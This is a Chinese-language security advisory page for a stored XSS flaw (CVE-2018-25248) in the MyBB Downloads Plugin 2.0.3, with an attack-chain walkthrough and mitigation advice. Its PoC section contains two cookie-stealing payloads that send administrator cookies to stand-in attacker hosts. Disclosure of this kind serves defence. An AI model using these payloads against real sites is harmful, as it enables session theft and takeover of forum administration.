CVE-2018-25248 CVSS 7.2 高危

CVE-2018-25248 MyBB下载插件存储型XSS漏洞

披露日期: 2026-04-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25248

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MyBB Downloads Plugin

漏洞概述

MyBB Downloads Plugin 2.0.3 版本存在严重的存储型跨站脚本（XSS）漏洞。该漏洞允许普通注册用户在提交下载资源时，于标题字段中注入恶意的HTML或JavaScript代码。一旦管理员登录后台并在downloads.php页面验证该下载，恶意脚本将自动执行。攻击者可利用此漏洞窃取管理员Session信息，进而接管论坛管理权限。

技术细节

该漏洞主要由于MyBB Downloads Plugin在处理用户提交的下载标题时，未实施有效的输入过滤和输出编码机制。攻击者利用此缺陷，可以在标题参数中构造XSS Payload。由于是持久型存储漏洞，Payload被保存在数据库中。根据CVSS向量分析，攻击无需用户交互（UI:N），当管理员访问审核页面时，浏览器将解析Payload并执行。结合S:C（范围改变），攻击者可能利用管理员权限影响整个MyBB系统的安全性。具体利用方式包括但不限于窃取Session ID、伪造管理员请求或植入钓鱼界面。这种针对管理后台的攻击往往能导致服务器被完全控制，属于高危安全风险。

攻击链分析

STEP 1

1. 注册账户

攻击者在受影响的MyBB论坛上注册一个普通用户账户。

STEP 2

2. 提交恶意下载

攻击者创建一个新的下载条目，并将包含JavaScript代码的恶意载荷填入“标题”字段中。

STEP 3

3. 触发漏洞

管理员登录后台，访问downloads.php页面以审核新提交的下载。

STEP 4

4. 执行攻击

管理员浏览器解析标题中的HTML/JS代码，恶意脚本在管理员上下文中执行，窃取Cookie或执行管理操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Inject malicious script into the download title field -->
<script>
  // Example: Send administrator cookies to attacker's server
  fetch('https://attacker-controlled-domain.com/log?c=' + document.cookie);
  alert('XSS Triggered');
</script>

<!-- Alternatively, use an image tag for stealth -->
<img src=x onerror="this.src='https://evil.com/steal?cookie='+document.cookie">

影响范围

MyBB Downloads Plugin 2.0.3

防御指南

临时缓解措施

在未修复漏洞前，建议暂时禁用插件的下载提交功能，或仅允许受信任的用户提交。管理员应避免直接点击审核未知的下载条目，并可在浏览器中禁用JavaScript以进行临时安全审核。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表